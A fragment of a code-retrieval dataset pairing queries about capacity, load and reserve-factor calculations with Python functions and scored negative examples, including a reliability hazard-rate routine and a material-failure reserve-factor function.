[1.0, 1.0, 1.0, 0.0, 0.0,\n 0.0], [1.0, 1.0, 1.0, 0.0, 0.0,\n 0.0], [1.0, 1.0, 0.0, 0.0, 0.0, 0.0], [\n 1.0, 1.2, 1.4, 0.0, 0.0, 0.0\n ], [1.0, 1.0, 1.2, 1.6, 0.0,\n 0.0], [1.0, 1.0, 1.0, 1.6, 0.0, 0.0], [\n 1.0, 1.0, 1.4, 0.0, 0.0, 0.0\n ], [1.0, 1.2, 1.5, 0.0, 0.0,\n 0.0], [1.0, 1.2, 0.0, 0.0, 0.0, 0.0]]],\n 7: [[[1.0, 1.2, 1.2, 1.6, 0.0, 0.0], [1.0, 1.0, 1.2, 1.6, 0.0, 0.0],\n [1.0, 1.0, 1.2, 1.2, 1.6, 0.0], [1.0, 1.0, 1.0, 1.1, 1.2, 1.6],\n [1.0, 1.0, 1.0, 1.0, 1.2, 1.6], [1.0, 1.0, 1.0, 1.0, 1.2, 1.6]],\n [[1.0, 1.2, 1.6, 0.0, 0.0, 0.0], [1.0, 1.2, 1.6, 0.0, 0.0, 0.0],\n [1.0, 1.0, 1.2, 1.6, 0.0, 0.0], [1.0, 1.0, 1.1, 1.2, 1.4, 0.0],\n [1.0, 1.0, 1.0, 1.2, 1.6, 0.0], [1.0, 1.0, 1.0, 1.1, 1.4, 0.0]]],\n 9: [1.0, 1.4, 2.0],\n 10: [1.0, 1.1, 1.4, 2.0, 2.5, 3.5],\n 11: [1.0, 1.4, 2.0],\n 12: [1.0, 1.4, 2.0],\n 13: [1.0, 1.1, 1.2, 1.4, 1.8],\n 14: [1.0, 1.1, 1.2, 1.4, 1.8],\n 15: [1.0, 1.1, 1.2, 1.4, 1.8]\n }\n # Dictionary containing the number of element breakpoints for determining\n # the resistance factor list to use.\n _dic_breakpoints = {\n 1: [1.0E5, 1.0E6, 1.0E7],\n 2: [1.0E5, 1.0E6, 1.0E7],\n 3: [100.0, 1.0E5, 1.0E6],\n 5: [1.0E4, 1.0E5, 1.0E6],\n 6: [[500.0, 1.0E3, 5.0E3, 7.5E3, 1.0E4, 1.5E4, 2.0E4],\n [100.0, 1.0E3, 1.0E4, 1.0E5, 1.5E5, 2.0E5]],\n 7: [500.0, 1.0E3, 5.0E3, 1.0E4, 2.0E4],\n 9: [2.0E3, 5.0E3],\n 10: [1.0E4, 2.0E4, 5.0E4, 1.0E5, 2.0E5],\n 11: [2.0E3, 5.0E3],\n 12: [2.0E3, 5.0E3],\n 13: [5.0E4, 1.0E5, 2.0E5, 5.0E5],\n 14: [5.0E4, 1.0E5, 2.0E5, 5.0E5],\n 15: [1.0E4, 5.0E4, 2.0E5, 1.0E6]\n }\n _dic_piV = {\n 9: [1.1, 1.05, 1.0, 1.1, 1.22, 1.4, 2.0],\n 10: [1.1, 1.05, 1.0, 1.1, 1.22, 1.4, 2.0],\n 11: [1.1, 1.05, 1.0, 1.1, 1.22, 1.4, 2.0],\n 12: [1.1, 1.05, 1.0, 1.1, 1.22, 1.4, 2.0],\n 13: [1.0, 1.05, 1.2],\n 14: [1.0, 1.05, 1.2],\n 15: [1.0, 1.05, 1.2]\n }\n _dic_piC = {10: [2.0, 1.0, 3.0, 1.5], 12: [2.0, 1.0]}\n _msg = ''\n\n # Calculate the base hazard rate.\n if attributes['subcategory_id'] == 2:\n _ref_temp = _dic_ref_temp[attributes['subcategory_id']][attributes[\n 'specification_id']]\n _f0 = _dic_factors[attributes['subcategory_id']][attributes[\n 'specification_id']][0]\n _f1 = _dic_factors[attributes['subcategory_id']][attributes[\n 'specification_id']][1]\n _f2 = _dic_factors[attributes['subcategory_id']][attributes[\n 'specification_id']][2]\n _f3 = _dic_factors[attributes['subcategory_id']][attributes[\n 'specification_id']][3]\n _f4 = _dic_factors[attributes['subcategory_id']][attributes[\n 'specification_id']][4]\n _f5 = _dic_factors[attributes['subcategory_id']][attributes[\n 'specification_id']][5]\n elif attributes['subcategory_id'] not in [4, 8]:\n _ref_temp = _dic_ref_temp[attributes['subcategory_id']]\n _f0 = _dic_factors[attributes['subcategory_id']][0]\n _f1 = _dic_factors[attributes['subcategory_id']][1]\n _f2 = _dic_factors[attributes['subcategory_id']][2]\n _f3 = _dic_factors[attributes['subcategory_id']][3]\n _f4 = _dic_factors[attributes['subcategory_id']][4]\n _f5 = _dic_factors[attributes['subcategory_id']][5]\n\n if attributes['subcategory_id'] == 4:\n attributes['lambda_b'] = 0.00006\n elif attributes['subcategory_id'] == 8:\n attributes['lambda_b'] = _dic_factors[attributes['subcategory_id']][\n attributes['type_id'] - 1]\n else:\n attributes['lambda_b'] = _f0 * exp(_f1 * (\n (attributes['temperature_active'] + 273.0) /\n _ref_temp))**_f2 * exp(((attributes['power_ratio'] / _f3) * (\n (attributes['temperature_active'] + 273.0) / 273.0)**_f4)**_f5)\n\n if attributes['lambda_b'] <= 0.0:\n _msg = _msg + 'RAMSTK WARNING: Base hazard rate is 0.0 when ' \\\n 'calculating resistor, hardware ID: ' \\\n '{0:d}'.format(attributes['hardware_id'])\n\n # Calculate the resistance factor (piR).\n if attributes['subcategory_id'] not in [4, 8]:\n _index = -1\n if attributes['subcategory_id'] == 6:\n _breaks = _dic_breakpoints[attributes['subcategory_id']][\n attributes['specification_id'] - 1]\n else:\n _breaks = _dic_breakpoints[attributes['subcategory_id']]\n\n for _index, _value in enumerate(_breaks):\n _diff = _value - attributes['n_elements']\n if len(_breaks) == 1 and _diff < 0:\n break\n elif _diff >= 0:\n break\n\n if attributes['subcategory_id'] in [6, 7]:\n attributes['piR'] = _dic_piR[attributes['subcategory_id']][\n attributes['specification_id'] - 1][attributes['family_id'] -\n 1][_index + 1]\n elif attributes['subcategory_id'] not in [4, 8]:\n attributes['piR'] = _dic_piR[attributes['subcategory_id']][_index +\n 1]\n\n # Determine the quality factor (piQ).\n attributes['piQ'] = _dic_piQ[attributes['subcategory_id']][\n attributes['quality_id'] - 1]\n\n if attributes['piQ'] <= 0.0:\n _msg = _msg + 'RAMSTK WARNING: piQ is 0.0 when calculating ' \\\n 'resistor, hardware ID: {0:d}'.format(attributes['hardware_id'])\n\n # Determine the environmental factor (piE).\n attributes['piE'] = _dic_piE[attributes['subcategory_id']][\n attributes['environment_active_id'] - 1]\n\n if attributes['piE'] <= 0.0:\n _msg = _msg + 'RAMSTK WARNING: piE is 0.0 when calculating ' \\\n 'resistor, hardware ID: {0:d}'.format(attributes['hardware_id'])\n\n # Calculate the temperature factor (piT).\n if attributes['subcategory_id'] == 4:\n attributes['temperature_case'] = (attributes['temperature_active'] +\n 55.0 * attributes['power_ratio'])\n attributes['piT'] = exp(-4056.0 * (\n (1.0 / (attributes['temperature_case'] + 273.0)) - 1.0 / 298.0))\n\n # Calculate the taps factor (piTAPS).\n if attributes['subcategory_id'] in [9, 10, 11, 12, 13, 14, 15]:\n attributes['piTAPS'] = (attributes['n_elements']**1.5 / 25.0) + 0.792\n\n # Calculate the voltage factor (piV).\n if attributes['subcategory_id'] > 8:\n _index = -1\n if attributes['subcategory_id'] in [9, 10, 11, 12]:\n _breaks = [0.1, 0.2, 0.6, 0.7, 0.8, 0.9]\n elif attributes['subcategory_id'] in [13, 14, 15]:\n _breaks = [0.8, 0.9]\n for _index, _value in enumerate(_breaks):\n _diff = _value - attributes['voltage_ratio']\n if len(_breaks) == 1 and _diff < 0.0:\n break\n elif _index == 0 and _diff >= 0.0:\n break\n elif _diff >= 0:\n break\n attributes['piV'] = _dic_piV[attributes['subcategory_id']][_index]\n\n # Determine the consruction class factor (piC).\n if attributes['subcategory_id'] in [10, 12]:\n attributes['piC'] = _dic_piC[attributes['subcategory_id']][\n attributes['construction_id'] - 1]\n\n # Calculate the active hazard rate.\n attributes['hazard_rate_active'] = (\n attributes['lambda_b'] * attributes['piQ'] * attributes['piE'])\n if attributes['subcategory_id'] == 4:\n attributes['hazard_rate_active'] = (\n attributes['hazard_rate_active'] * attributes['piT'] *\n attributes['n_elements'])\n elif attributes['subcategory_id'] in [9, 11, 13, 14, 15]:\n attributes['hazard_rate_active'] = (\n attributes['hazard_rate_active'] * attributes['piTAPS'] *\n attributes['piR'] * attributes['piV'])\n elif attributes['subcategory_id'] in [10, 12]:\n attributes['hazard_rate_active'] = (\n attributes['hazard_rate_active'] * attributes['piTAPS'] *\n attributes['piC'] * attributes['piR'] * attributes['piV'])\n elif attributes['subcategory_id'] != 8:\n attributes['hazard_rate_active'] = (\n attributes['hazard_rate_active'] * attributes['piR'])\n\n return attributes, _msg", "def weight(self):\n counters = [\n (\"total_mhz\", self.dominfo.vms_online + self.dominfo.cpus_online / 4.0),\n (\"memory\", self.dominfo.vms_online + self.dominfo.ram_online / 4096.0),\n ]\n load_w = sum((self.node[k] / float(v or 1)) / self.node[k] for k, v in counters)\n return load_w * self.srv_weight", "def calc_boiler_const(Q_load_Wh, thermal_efficiency):\n Q_fuel_Wh = Q_load_Wh / thermal_efficiency\n Q_losses_Wh = Q_fuel_Wh - Q_load_Wh\n\n return Q_fuel_Wh, Q_losses_Wh", "def exceeds_shelf_capacity(shelf, fabric):\n shelf_total = Decimal(shelf.fabrics.all().aggregate(Sum('quantity_th'))['quantity_th__sum'] or 0)\n return True if (shelf_total) + fabric.quantity > max_shelf_qty else False", "def selling_price(self):\n # If a system can't produce something, its price is zero.\n _good = self.tradeitem\n if self.planet.tech_level < _good.tp and _good.name not in 'fuel':\n sell_price = 0\n else:\n sell_price = self.standard_init_price()\n # raise a bit, randomized\n sell_price = sell_price + random.randrange(self.tradeitem.var)\n\n return int(sell_price)", "def find_free(min_=0):\n while is_occupied(min_):\n min_ += 1\n return min_", "def calculate_available_link_res (self, sg_hops_to_be_ignored, mode=MODE_ADD):\n # set availbandwidth to the maximal value\n for i, j, k, d in self.network.edges_iter(data=True, keys=True):\n if d.type == 'STATIC':\n setattr(self.network[i][j][k], 'availbandwidth', d.bandwidth)\n # subtract the reserved link and internal (inside Infras) bandwidth\n if mode == self.MODE_ADD:\n for d in self.infras:\n for p in d.ports:\n for fr in p.flowrules:\n if fr.id not in sg_hops_to_be_ignored and fr.bandwidth is not None:\n # Flowrules are cummulatively subtracted from the switching \n # capacity of the node.\n d.availres['bandwidth'] -= fr.bandwidth\n if d.availres['bandwidth'] < 0:\n raise RuntimeError(\"The node bandwidth of %s got below zero \"\n \"during available resource calculation!\" %\n d.id)\n # Get all the mapped paths of all SGHops from the NFFG\n sg_map = NFFGToolBox.get_all_sghop_info(self, return_paths=True)\n for sg_hop_id, data in sg_map.iteritems():\n src, dst, flowclass, bandwidth, delay, path = data\n if bandwidth is not None:\n for link in path:\n link.availbandwidth -= bandwidth\n if link.availbandwidth < 0:\n raise RuntimeError(\n \"The link bandwidth of %s got below zero during\"\n \"available resource calculation!\" % link.id)", "def available_capacity(self):\r\n return self.capacity - len(self.passengers)", "def get_amount_out(amount_in, reserve_in, reserve_out):\n assert amount_in > 0\n assert reserve_in > 0 and reserve_out > 0\n amount_in_with_fee = amount_in*997\n numerator = amount_in_with_fee*reserve_out\n denominator = reserve_in*1000 + amount_in_with_fee\n return float(numerator/denominator)", "def calc_reduction_diesel_used (self):\n self.reduction_diesel_used = self.diesel_equiv_captured - \\\n self.loss_heat_recovery\n #~ print 'self.reduction_diesel_used',self.reduction_diesel_used", "def load_factor(self) -> float:\n return self.filled_count / self.table_size", "def scale_blackhurst_results_to_usgs_values(\n df_load, attr, download_FBA_if_missing):\n # determine national level published withdrawal data for usgs mining\n # in FBS method year\n pv_load = load_fba_w_standardized_units(\n datasource=\"USGS_NWIS_WU\", year=str(attr['helper_source_year']),\n flowclass='Water', download_FBA_if_missing=download_FBA_if_missing)\n\n pv_sub = pv_load[(pv_load['ActivityConsumedBy'] == 'Mining') &\n (pv_load['Compartment'] == 'total') &\n (pv_load['FlowName'] == 'total')].reset_index(drop=True)\n # rename the published value flow name and merge with Blackhurst data\n pv_sub = pv_sub.rename(columns={'FlowAmount': 'pv'})\n df = df_load.merge(pv_sub[['Location', 'pv']], how='left')\n # calculate the difference between published value and allocated value\n # for each naics length\n df = df.assign(nLen=df['SectorConsumedBy'].apply(lambda x: len(x)))\n # calculate initial FlowAmount accounted for\n df = df.assign(av=df.groupby('nLen')['FlowAmount'].transform('sum'))\n # calc difference\n df = df.assign(vd=df['pv'] - df['av'])\n\n # subset df to scale into oil and non-oil sectors\n df['sector_label'] = np.where(df['SectorConsumedBy'].apply(\n lambda x: x[0:5] == '21111'), 'oil', 'nonoil')\n df['ratio'] = np.where(df['sector_label'] == 'oil', 2 / 3, 1 / 3)\n df['label_sum'] = df.groupby(['Location', 'nLen', 'sector_label'])[\n 'FlowAmount'].transform('sum')\n\n # calculate revised water withdrawal allocation\n df_scaled = df.copy()\n df_scaled.loc[:, 'FlowAmount'] = \\\n df_scaled['FlowAmount'] + \\\n (df_scaled['FlowAmount'] / df_scaled['label_sum']) * \\\n (df_scaled['ratio'] * df_scaled['vd'])\n df_scaled = df_scaled.drop(columns=['sector_label', 'ratio', 'nLen',\n 'label_sum', 'pv', 'av', 'vd'])\n\n return df_scaled", "def new_capacity_rule(mod, g, p):\n return 0", "def _get_observation_lower_bound(self):\n lower_bound = -self._get_observation_upper_bound()\n lower_bound[-7] = 0.0\n lower_bound[-2:] = [self.min_speed, self.min_side_speed]\n return lower_bound", "def new_fixed_assets(self) -> float:\n old_depot_ppe = (\n self.balance_sheet.assets.of_which_pe * self.inputs.ppe_pct_depot\n )\n old_fleet_net_value = self.balance_sheet.assets.of_which_fleet\n\n adjustment_factor = (\n self.inputs.trucks_total / self.operations.productivity.avg_num_trucks - 1\n )\n incremental_depot = old_depot_ppe * adjustment_factor\n incremental_fleet = old_fleet_net_value * adjustment_factor\n return incremental_fleet + incremental_fleet", "def branching_factor(data, loc):\n\n return 20", "def __call__(self, auctioneer):\n curr_bid = auctioneer.current_bid\n bid_price = curr_bid * self._bid_increase_perc\n if bid_price <= self._budget and self.get_bid_probability() > 0.3:\n self._highest_bid = bid_price\n return bid_price\n return 0", "def useWater(self, used):\n self.amount = max(0, self.amount - used)", "def new_revenue(self) -> float:\n revenue_collections = self.demand_served() * self.inputs.revenue_per_m3\n return revenue_collections + self.revenue_landfill()", "def soft_thresh(x: float, lmb: float) -> float:\n if x < lmb:\n return x + lmb\n elif x > lmb:\n return x - lmb\n else:\n return 0.0", "def calculate_overbook_num(self):\n\n overbook_level_decimal = self.overbook_level / float(100.0)\n return self.num_rooms + math.ceil(overbook_level_decimal * self.num_rooms)", "def lower_bound(self) -> float:\n ...", "def Componentwise_Boosting(df_train, df_test, nu):\n\n # number of individual forecasts and number of periods\n K = df_test.shape[1]\n T = df_train.shape[0]\n T_test = df_test.shape[0]\n\n # variable of interest\n y = df_train.iloc[:, 0].values[:, np.newaxis]\n y_bar = np.mean(y)\n\n # individual forecasts\n F = np.swapaxes(df_train.iloc[:, 1:].values, 0, 1)[:, :, np.newaxis]\n F_t = np.swapaxes(F, 1, 2)\n F_test = np.swapaxes(df_test.values, 0, 1)[:, :, np.newaxis]\n\n # 5-fold CV to determine optimal M\n # length of training and testing sets\n T_cv_test = int(T/5)\n T_cv_train = T - T_cv_test\n\n # initialize vector to store the precision of fit\n SSR_vec = np.full(1000, 0, dtype=float)\n\n # find the optimal number of boosting iterationts using 5-fold CV\n # CV folds\n for k in range(5):\n\n # definition of the test and training sample for the given CV round\n cv_index = np.full(T, True, dtype=bool)\n cv_index[(k*T_cv_test):((k+1)*T_cv_test)] = False\n\n y_cv = y[cv_index]\n y_cv_bar = np.mean(y_cv)\n y_cv_test = y[~cv_index]\n\n F_cv = F[:, cv_index, :]\n F_cv_t = F_t[:, :, cv_index]\n F_cv_test = F[:, ~cv_index, :]\n\n # initialization step\n psi = np.tile(y_cv_bar, (T_cv_train, 1))\n psi_test = np.tile(y_cv_bar, (T_cv_test, 1))\n\n # main steps\n for m in range(1000):\n\n # compute the negative gradient vector\n u = y_cv - psi\n\n # regress the negative gradient vector on the ind. forecasts\n beta_hat = np.matmul(\n 1/np.matmul(F_cv_t, F_cv),\n np.matmul(F_cv_t, np.tile(u, (K, 1, 1)))\n )\n\n # save the sums of the squared residuals\n SSR = np.dot(np.ones(T_cv_train), (u - (beta_hat * F_cv))**2)\n\n # find the minimum SSR and its corresponding ind.forecast\n k_star = np.argmin(SSR)\n\n # update\n psi += nu * beta_hat[k_star, :, :] * F_cv[k_star, :, :]\n psi_test += nu * beta_hat[k_star, :, :] * F_cv_test[\n k_star, :, :]\n\n # save the precision of the fit\n SSR_vec[m] += np.sum((y_cv_test - psi_test)**2)\n\n # find number of iterations for which the MSE is the lowest\n M = np.argmin(SSR_vec) + 1\n\n # final Gradient Boosting with pre-determined number of iterations M\n # initialization step\n psi = np.tile(y_bar, (T, 1))\n psi_test = np.tile(y_bar, (T_test, 1))\n\n # main steps\n for m in range(M):\n\n # compute the negative gradient vector\n u = y - psi\n\n # regress the negative gradient vector on the individual forecasts\n beta_hat = np.matmul(\n 1/np.matmul(F_t, F),\n np.matmul(F_t, np.tile(u, (K, 1, 1)))\n )\n\n # save the sums of the squared residuals\n SSR = np.dot(np.ones(T), (u - (beta_hat * F))**2)\n\n # find the minimum SSR and its corresponding individual forecast\n k_star = np.argmin(SSR)\n\n # update\n psi += nu * beta_hat[k_star, :, :] * F[k_star, :, :]\n psi_test += nu * beta_hat[k_star, :, :] * F_test[k_star, :, :]\n\n # predictions\n df_pred = pd.DataFrame(\n {\"Componentwise Boosting\": psi_test.flatten()},\n index=df_test.index\n )\n\n return df_pred", "def test_safety_stock(self):\n safety_stock = self._uncertain_demand.safety_stock\n avg_order = sum([int(item) for item in self._data_set.values()]) //len(self._data_set)\n variance = [(item - avg_order) for item in self._data_set.values()]\n stdev = pow(sum([pow(j, 2) for j in variance]) / len(self._data_set), 0.5)\n cal_safety = lambda x, y, z: x * y * (z ** 0.5)\n test_safety = cal_safety(float(self._z_value), float(stdev), float(self._lead_time))\n self.assertEqual(float(safety_stock), float(test_safety))", "def overall_reduction(self):\n return 84", "def cost(self):\n lg = len(self.guarantees.cnf)\n la = len(self.assumptions.cnf)\n\n \"\"\"heuristic\n Low: guarantees while assuming little (assumption set is bigger)\n High: guarantees while assuming a lot (assumption set is smaller)\"\"\"\n\n return la / lg", "def overhead(readings):\n return 100.0 * (int(readings[0]) + int(readings[1])) / (int(readings[2]) + int(readings[3]))", "def fuel_required(mass):\n return int(floor(mass / 3) - 2)", "def mimic_generation_capacity(base_grid, ref_grid):\n base_plant = base_grid.plant\n ref_plant = ref_grid.plant\n plant_scaling = ref_plant.Pmax / base_plant.Pmax\n # Element-wise division will return NaN for plants not in ref_grid\n plant_scaling = plant_scaling.fillna(0)\n change_table = _calculate_common_zone_factors(base_plant, ref_plant, plant_scaling)\n return change_table", "def buy_resource(self, num_res):\n check_pur = self.poss_purchases()\n if num_res in check_pur.keys():\n update_res = num_res\n for bin in self.capacity_list:\n for i, res in enumerate(bin[1]):\n if res == 1 and update_res > 0:\n bin[1][i] = 0\n update_res -= 1\n return (num_res, check_pur[num_res])\n else:\n return 'not enough resources'", "def _calc_worker_assign_limits(self, initial_count, occupied=None):\n occupied = occupied or dict()\n actual_count = initial_count - sum(occupied.values())\n\n endpoint_res = sorted(self._worker_slots.items(), key=operator.itemgetter(1),\n reverse=True)\n\n endpoints = [t[0] for t in endpoint_res]\n endpoint_cores = np.array([t[1] for t in endpoint_res]).astype(np.float32)\n\n # remove assigned nodes from limitations\n counts = initial_count * endpoint_cores / endpoint_cores.sum()\n for idx, ep in enumerate(endpoints):\n counts[idx] = max(0, counts[idx] - occupied.get(ep, 0))\n\n # all assigned, nothing to do\n if counts.sum() == 0:\n return dict((ep, 0) for ep in endpoints)\n\n counts = (actual_count * counts / counts.sum()).astype(np.int32)\n\n # assign remaining nodes\n pos = 0\n rest = actual_count - counts.sum()\n while rest > 0:\n counts[pos] += 1\n rest -= 1\n pos = (pos + 1) % len(counts)\n return dict(zip(endpoints, counts))", "def fs_used_including_snapshot_reserve(self):\n return self._fs_used_including_snapshot_reserve", "def calcul_risk(self):\n if (self.take_profit - self.buy_price) >= (\n self.buy_price - self.stop_loss\n ) * self.risk:\n return True\n else:\n return False", "def bcRange(self):\n\t\treturn fabs(self.Upper - self.Lower)", "def calc_annual_electric_savings (self):\n price = self.diesel_prices\n #TODO add rural v non rural\n self.base_generation_cost = self.electric_diesel_reduction * price\n\n\n self.proposed_generation_cost = self.maintenance_cost\n\n self.annual_electric_savings = self.base_generation_cost - \\\n self.proposed_generation_cost\n #~ print 'self.annual_electric_savings',self.annual_electric_savings", "def prescaler(self) -> int:" ]
[ "0.6212213", "0.5960155", "0.59591246", "0.58988106", "0.57863295", "0.5742012", "0.56890213", "0.5643248", "0.5618332", "0.56007034", "0.55502635", "0.55463886", "0.5537825", "0.551547", "0.5508426", "0.54879606", "0.5471865", "0.54627365", "0.5456973", "0.545685", "0.5449931", "0.54451865", "0.5411737", "0.5410543", "0.5409004", "0.53970325", "0.53886425", "0.5338527", "0.53322047", "0.5325783", "0.5319092", "0.53092116", "0.5301152", "0.5287885", "0.5285471", "0.5284035", "0.52802616", "0.52590275", "0.5253795", "0.52535844", "0.5251049", "0.5244019", "0.5242395", "0.5239526", "0.52340674", "0.5230234", "0.52249736", "0.5208666", "0.520263", "0.519616", "0.51783067", "0.51687056", "0.5168119", "0.5167897", "0.51443934", "0.51338583", "0.51307863", "0.51265764", "0.5125124", "0.51136833", "0.51119024", "0.51106834", "0.5104637", "0.5089365", "0.5087533", "0.5086997", "0.50829935", "0.5082549", "0.50658965", "0.5065678", "0.5060141", "0.50601184", "0.50486046", "0.50444955", "0.5043519", "0.50376934", "0.50247216", "0.5021721", "0.50210375", "0.5020717", "0.5019606", "0.50179726", "0.50084776", "0.5002881", "0.5000679", "0.4990686", "0.49881756", "0.4985235", "0.4983722", "0.49757388", "0.4973242", "0.4970725", "0.4965482", "0.49640235", "0.49577102", "0.495653", "0.49547645", "0.49447912", "0.49389136", "0.49345282" ]
0.49897957
86
Calculate the reserve factor for Material Failure by calculating the critical load and comparing to the applied load. Return the reserve factor adjusted for inequalities based around =>0
def matFail(dim): bst = dim[0] tst = dim[1] tsk = dim[2] Et = (Esk * tsk) + (Est * ((bst * tst) / bsk)) Nmat = Et*maxstrain # Critical Load rsf = Nmat/Nx return rsf - 1.1 # Using a target Reserve Factor of >=1.1
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_load_factor(self):\n # Your code here\n return self.total_items / self.capacity", "def fuel_required(mass):\n return max(math.floor(mass/3) - 2, 0)", "def getRepairCapacity(self):\n return int(self.myDesign.getSYCRequired() * (1-(self.strength/100.0)))", "def internal_external_canopy_heat_capacity(lumped_cover_heat_capacity: float) -> float:\n return 0.1 * lumped_cover_heat_capacity", "def test_getThermalExpansionFactorConservedMassByLinearExpansionPercent(self):\n hotTemp = 700.0\n dLL = self.component.material.linearExpansionFactor(\n Tc=hotTemp, T0=self._coldTemp\n )\n ref = 1.0 + dLL\n cur = self.component.getThermalExpansionFactor(Tc=hotTemp)\n self.assertAlmostEqual(cur, ref)", "def get_fuel_requirements(mass: int) -> int:\n return int(mass / 3) - 2", "def fuel_required(mass):\n return int(floor(mass / 3) - 2)", "def calculate_effective_capacitance(self, load):\n c_load = load\n # In fF\n c_para = spice[\"min_tx_drain_c\"] * (self.nmos_size / parameter[\"min_tx_size\"])\n transition_prob = 0.1875\n return transition_prob * (c_load + c_para)", "def test_excess_quantity(self):\n excess = self._uncertain_demand.excess_stock\n avg_order = sum([int(item) for item in self._data_set.values()]) //len(self._data_set)\n variance = [(item - avg_order) for item in self._data_set.values()]\n stdev = pow(sum([pow(j, 2) for j in variance]) / len(self._data_set), 0.5)\n cal_safety = lambda x, y, z: x * y * (z ** 0.5)\n safety_stock = cal_safety(float(self._z_value), float(stdev), float(self._lead_time))\n cal_reorder_level = lambda x, y, z: ((x ** 0.5) * y) + z\n reorder = cal_reorder_level(float(self._lead_time), avg_order, float(safety_stock))\n cal_excess = lambda x, y, z: round(x - (y + (y - z)), 0) if x > y + (y - z) else 0\n test_excess = cal_excess(self._quantity_on_hand, reorder, safety_stock)\n self.assertEqual(int(excess), int(test_excess))", "def get_duct_linear_heat_loss_coefficient() -> float:\n return 0.49", "def penalty(self):\n return 0", "def get_fuel_total_saved (self):\n #~ print self.lost_heat_recovery\n #~ print self.intertie_offset_generation_fuel_used\n #~ print self.pre_intertie_generation_fuel_used\n #~ gen_eff = self.cd[\"diesel generation efficiency\"]\n #~ fuel_used = self.intertie_offset_generation / gen_eff\n\n generation_diesel_reduction = \\\n np.array(self.pre_intertie_generation_fuel_used\\\n [:self.actual_project_life])\n return - np.array(self.lost_heat_recovery[:self.actual_project_life]) +\\\n generation_diesel_reduction", "def fuel_calc(mass):\n return max((mass / 3) - 2, 0)", "def verify_load_feasibility(self):\n max_load = 0\n for pp in self.powerplants:\n max_load += pp[\"pmax\"]\n\n min_load = max_load\n for pp in self.powerplants:\n min_load = min(pp[\"pmin\"], min_load)\n\n if self.load > max_load:\n self.feasible = False\n self.unfeasible_reason = f\"Requested load {self.load/10} too high for our powerstations \"\n return False\n\n if self.load < min_load:\n self.feasible = False\n self.unfeasible_reason = f\"Requested load {self.load/10} too low for our powerstations \"\n return False\n\n return True", "def calculate_criticality(self, item_hr):\n _error_code = 0\n _msg = 'RAMSTK SUCCESS: Calculating failure mode {0:d} criticality.'.\\\n format(self.mode_id)\n\n if item_hr < 0.0:\n _error_code = 2010\n _msg = _(u\"RAMSTK ERROR: Item hazard rate has a negative value.\")\n raise OutOfRangeError(_msg)\n if not 0.0 <= self.mode_ratio <= 1.0:\n _error_code = 2010\n _msg = _(\n u\"RAMSTK ERROR: Failure mode ratio is outside the range of \"\n u\"[0.0, 1.0].\")\n raise OutOfRangeError(_msg)\n if self.mode_op_time < 0.0:\n _error_code = 2010\n _msg = _(u\"Failure mode operating time has a negative value.\")\n raise OutOfRangeError(_msg)\n if not 0.0 <= self.effect_probability <= 1.0:\n _error_code = 2010\n _msg = _(u\"Failure effect probability is outside the range \"\n u\"[0.0, 1.0].\")\n raise OutOfRangeError(_msg)\n\n self.mode_hazard_rate = item_hr * self.mode_ratio\n self.mode_criticality = self.mode_hazard_rate \\\n * self.mode_op_time * self.effect_probability\n\n if self.mode_hazard_rate < 0.0:\n _error_code = 2010\n _msg = _(u\"Failure mode hazard rate has a negative value.\")\n raise OutOfRangeError(_msg)\n if self.mode_criticality < 0.0:\n _error_code = 2010\n _msg = _(u\"Failure mode criticality has a negative value.\")\n raise OutOfRangeError(_msg)\n\n return _error_code, _msg", "def _check_capacity_limit(self, res, amt, balance, meta, raven_vars, dispatch, t, level):\n # note \"amt\" has units of AMOUNT not RATE (resource, not resource per second)\n sign = np.sign(amt)\n # are we storing or providing?\n #print('DEBUGG supposed current level:', level)\n if sign < 0:\n # we are being asked to consume some\n cap, meta = self.get_capacity(meta, raven_vars, dispatch, t)\n available_amount = cap[res] - level\n #print('Supposed Capacity, Only calculated ins sign<0 (being asked to consumer)',cap)\n else:\n # we are being asked to produce some\n available_amount = level\n # the amount we can consume is the minimum of the requested or what's available\n delta = sign * min(available_amount, abs(amt))\n return {res: delta}, meta", "def get_remaining_fuel(self):\n return min(self.liquid_fuel, self.oxidizer)", "def calculate_demand(self):\r\n \r\n for cell in self.cells:\r\n cell.demand = min(cell.volume, self.max_volume) /self.interval\r\n self.demand = self.cells[-1].demand", "def lookup_effective_mass_area_factor(self, cm):\n\n if cm == 0.0:\n return 0.0\n elif 0.0 < cm <= 165000.0:\n return 2.5\n else:\n return 3.2", "def total_sdram_requirements(self):", "def penalty_calc(self):\n self.p_budget = (self.tx_oma_min - self.rx_unstressed_sensitivity - self.fiber_conn_loss)*self.l_1\n\n # fiber attenuation,\n self.p_atten = self.alpha*self.length # column B\n\n # calculate bandwidth for RIN test (exclude transmitter)\n rin_inverse_bw = np.sqrt(np.square(1.0/self.bw_cd) + np.square(1.0/self.bw_md) + (0.477/(self.rx_bw**2))*self.l_1)\n rin_bw = 1.0 / rin_inverse_bw\n\n # see FC-MSQS-2 equation B.47 in Annex B.4 for the following k_rin = math.sqrt(2.0/math.pi)*erfinv(0.8)\n k_rin = 0.7\n\n # v_rin,\n self.v_rin = (k_rin*1E6*(self.rin_test_isi**2)*rin_bw*\n math.pow(10.0,0.1*self.rin)) # column AK\n\n # Prin,\n print('v_rin: ', self.v_rin)\n print('Q: ',self.Q)\n print('isi_dj_refl_closed :', self.isi_dj_refl_closed)\n self.p_rin = -10.0*np.log10(np.sqrt(1.0-np.multiply(self.v_rin, np.square(self.Q/self.isi_dj_refl_closed)))) # column R\n print(\"P_rin : \", self.p_rin)\n self.beta = (3.14159E-6*self.speedup*self.br_nominal *self.delta_lambda*self.d1*self.length) # column O\n self.sigma_mpn = (self.k_mpn/math.sqrt(2.0)*(self.l_1 -np.exp(-np.square(self.beta)))) # column P\n self.p_mpn = (-10.0*np.log10(np.sqrt(self.l_1 - (self.Q**2)*np.square(self.sigma_mpn)))) # column Q\n self.p_blw = (-10.0*math.log10(math.sqrt(1.0- ((self.Q*self.sigma_blw)/ self.isi_tp4_rx)**2))*self.l_1) # cell T13\n self.p_reflection = -10.0*np.log10(self.isi_reflection) # column N\n self.v_mn = (((1.0-math.pow(10.0,-0.2*self.pmn))/ (self.Q)**2)*self.l_1) # cell AG7\n print(\"isi_center : \", self.isi_center)\n\n self.p_isi_center = -10.0*np.log10(self.isi_center) # column J\n\n self.p_isi_corners = (-10.0*np.log10(self.isi_corners) - self.p_isi_center) # column K\n self.p_isi_dj_center = (-10.0*np.log10(self.isi_dj_refl_closed) - self.p_isi_center) # column L\n self.p_isi_dj_corners = 